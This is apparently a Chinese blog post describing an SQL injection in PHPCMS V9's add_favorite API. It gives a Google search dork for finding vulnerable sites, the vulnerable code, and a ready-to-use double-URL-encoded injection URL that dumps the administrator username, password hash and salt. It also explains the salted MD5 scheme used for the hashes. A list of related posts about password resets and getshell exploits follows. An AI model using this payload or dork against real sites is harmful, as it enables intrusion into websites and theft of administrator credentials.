PHPCMS V9爆后台密码

最新推荐文章于 2024-05-15 05:08:03 发布
最新推荐文章于 2024-05-15 05:08:03 发布
阅读量2.1k 收藏
点赞数 1
分类专栏: 漏洞收集 文章标签: phpcms V9 PHPCMS V9

谷歌关键字:inurl:”index.php?m=content+c=rss+catid=10″

在phpcms/api.php?op=add_favorite中使用了urldecode,导致了一个sqlinject漏洞。

$title = urldecode($title);

省略……

$data = array(‘title’=>$title, ‘url’=>$url, ‘adddate’=>SYS_TIME, ‘userid’=>$userid);
省略……

$favorite_db->insert($data);

(需要你先注册一个账户并且登陆后访问那个接口文件才会报错,进而注入!)

利用POC:
1、注册用户后,访问如下URL获取admin表的前缀:

http://www.1990day.com/api.php?op=add_favorite&url=xx.oo&title=%2527

修改如下URL中的admin表前缀名(xxoo_admin),直接爆出管理员的用户名:密码:随机字串

http://www.1990day.com/api.php?op=add_favorite&url=xx.oo&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280×23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520xxoo_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271

PS:phpcms v9的加密方式是,先将密码过滤空格后,对密码进行md5加密,然后连接一个随机生成的字符串,并对这个新的字符串加密,生成的md5字符串为最终的md5加密密码。

7禧
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpcms 2008 后台超级管理员密码忘记,教你重置超级管理员密码
09-07
phpcms2008后台超级管理员密码忘记怎么办,执行以下这个php程序,数据库的超级管理员密码就被你改过来了,用户名要填写你的超级管理员用户名!!!
phpcms v9 密码
ice
07-25 475
   1.首先是http://www.wooyun.org/bugs/wooyun-2010-010072       有人报告phpcms v9 直接密码     开始我还比较迷惑,因为我记得我看过phpcms v9 的管理员密码体系是有salt的,光密码没啥用啊?     2.后面有人指出了是和前一个http://www.wooyun.org/bugs/wooyun-2010-09...
最全PHPcms V9 任意文件上传漏洞_phpcmsv9漏洞(3),2024年最新闭关60天学懂NDK+物联网嵌入式
最新发布
2401_85015332的博客
05-15 337
漏洞出来的时间是2017年4月份左右,时间比较长了,存在任意文件长传,漏洞利用比较简单,危害很大,可以直接前台getshell。
phpcms v9忘记后台密码解决方法
huangleijay的专栏
10-08 820
1.在没有安装过phpcms v9的电脑上安装phpcms v9,管理员用户名为phpcms密码phpcms; 2.利用phpmyadmin访问mysql数据库,查找v9_admin表,里面有这个两个重要的字段信息:password和encrypt; 3.输入sql语句:SELECT * FROM `v9_admin` ,显示如下信息 userid username pa
php万能后台密码,Key神-万能CMS网站后台密码重设工具
weixin_42501892的博客
03-13 403
“Key神-万能密码重设工具”为安全联盟站长平台为了解决长期困恼站长们的一个世纪难题:“我忘记后台密码了!怎么办?”而诞生的!本程序采用了“云端”更新技术,可自动识别网站程序。站长只需要简单将程序下载并上传到网站跟目录下,输入密码即可修改网站后台管理员密码。自从有了安全联盟“Key神”,嘛嘛再也不用担心我忘记后台管理密码了!更新日志:[更新纪录-2013.11.23]*新加destoob b2b、...
Phpcms V9管理后台密码重置的两种方法
ougexingfuba的博客
09-09 1679
最近,一个朋友使用NITC这个程序,忘记了管理密码,需要重置,研究了下方法,同样的类推:Phpcms V9管理后台密码忘记了应该怎么办?在这里,CMSYOU与大家分享下Phpcms V9管理后台密码重置的两种方法。 在PC V9里边,重置管理密码就没有Phpcms2008那么容易(PC2008怎么重置密码将在第二页讲到),需要同时修改MD5密文和一个随机的加密验证码。 如上图,passwo...
phpcms v9忘记管理员后台密码的解决方法
09-29
主要介绍了phpcms v9忘记管理员后台密码的解决方法,需要的朋友可以参考下
Phpcms V9 管理后台登陆及会员注册登录模板的修改方法
09-29
最后,为了方便在后台直接在线编辑模板,你需要了解PC V9后台的模板权限设置。虽然在设置界面没有直接关闭在线编辑的选项,但可以通过修改配置文件来实现。通常,这涉及到修改`config.php`或`data/config.php`文件,...
phpcms V9 邮箱配置方法
09-29
在你的phpcms V9后台,进入“设置”菜单,然后选择“邮箱设置”和“基本设置”。在这里,输入你的管理员邮箱地址,这是你在QQ企业邮箱注册时所用的地址。保存这些设置后,phpcms将使用这个邮箱来发送系统邮件。 ...
phpcms v9恢复管理员密码插件源代码
03-18
phpcms v9恢复管理员密码插件 帮你找回忘记的后台密码。 版本:1.0 功能:找回忘记的管理员密码 附件:下载的压缩包里包含gbk和utf两个版本,请选择对应的编码。 使用方法: 请各位童鞋下载和您网站对应编码的附件,...
PHPCMS忘记后台密码的解决办法
12-18
当用户不幸忘记PHPCMS后台的管理员密码时,解决这个问题需要一定的技术操作。首先,值得注意的是,PHPCMS密码重试有严格的限制,只有八次尝试机会,如果超过这个次数,系统会锁定账户一个小时,以防止恶意尝试。 ...
PHPCMS V9 加密规则(经测试相当不错)
09-29
PHPCMS V9 加密规则:对输入的密码32位小写 MD5 对输入的密码进行trim过滤,下面有个不错的示例,大家可以参考下
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
本文来分析一下PHPCMS V9专题模块注入漏洞
利用phpcms v9 0day拿shell+提权.wps
12-31
此Oday非同寻常,速度下载吧黑友们!一天几个站没问题!
phpcms mysql 密码_Phpcms V9管理后台密码重置的两种方法
weixin_32017023的博客
01-19 328
在PC V9里边,重置管理密码就没有Phpcms2008那么容易(PC2008怎么重置密码将在第二页讲到),需要同时修改MD5密文和一个随机的加密验证码。如上图,password是md5小写加密的密码,encrypt则是对应的随机加密的验证码。了解这个机制之后,具体修改PC V9后台管理密码的方法是:通过Phpmyadmin等工具,打开数据库中找到admin表:把password字段值改为:0b8...
phpcmsV9 管理员密码丢失或忘记了怎么办
ECHO陈文的博客
12-22 1184
最近公司从其他公司接手一些二手的项目,都是phpcms 做的,再进入后台时不知道后台密码是什么,这就很头疼了。 最简单的方法,手动改数据库:一般的虚拟主机商都提供了PHPmyAdmin,http://localhost/phpmyadmin/index.php 默认帐号密码是admin 选择v9_admin这个表,编辑字段,password ,变成:fa3250300be9b7ab0848257
phpcmsV9后台入口安全问题
草巾冒小子的博客
10-09 1937
疑惑: 使用过phpcms框架的都清楚,登录后台的默认入口是localhost/index.php?m=admin,如何屏蔽该入口?这个问题关系着框架网站的整体安全。 闲话不多说,直接奉上解决之法。 以自定义后台入口:http://localhost/domysite 为例。 1. 自定义后台入口 [ 新建一个文件夹+两个.php文件 ] 在根目录下,新建文件夹,并命名为domysite,...
phpcms v9文件上传漏洞复现
qq_50646296的博客
08-21 1837
我们通过软件burp suite 抓包,修改一个变量,不停的发包,我们可以手动或者让软件不停的访问我们呢上传的PHP,如果显示出PHP内容,时间竞争成功。方法:我们发现它只是删除了压缩包里面的文件,但这段代码并不会对解压后的文件夹递归删除,只能对解压的文件直接删除。分析:当程序不递归删除时,我们直接将图片和.php文件压缩上传,会发现图片还在,.php文件被删除了。此时,我们再将其上传,可以看到,我们的PHP文件就被保留下来了。我们创建一个文件夹,放入以下文件,然后将这个文件经行压缩。
PHPCMS v9本地文件包含漏洞Getshell
fansenliangren的博客
12-01 1457
文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行,并得到网站配置或者敏感文件,进而获取到服务器权限,造成网站被恶意删除,用户和交易数据被篡改等一系列恶性后果......
生成一个 phpcms v9 后台管理员的为 admin 加密后密码字符串
06-12
但是,我可以告诉你如何生成一个 phpcms v9 后台管理员的密码字符串。 phpcms v9 后台管理员的密码字符串使用了 md5 算法进行加密,具体步骤如下: 1. 首先,在管理员密码后面添加一个默认的字符串,例如:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值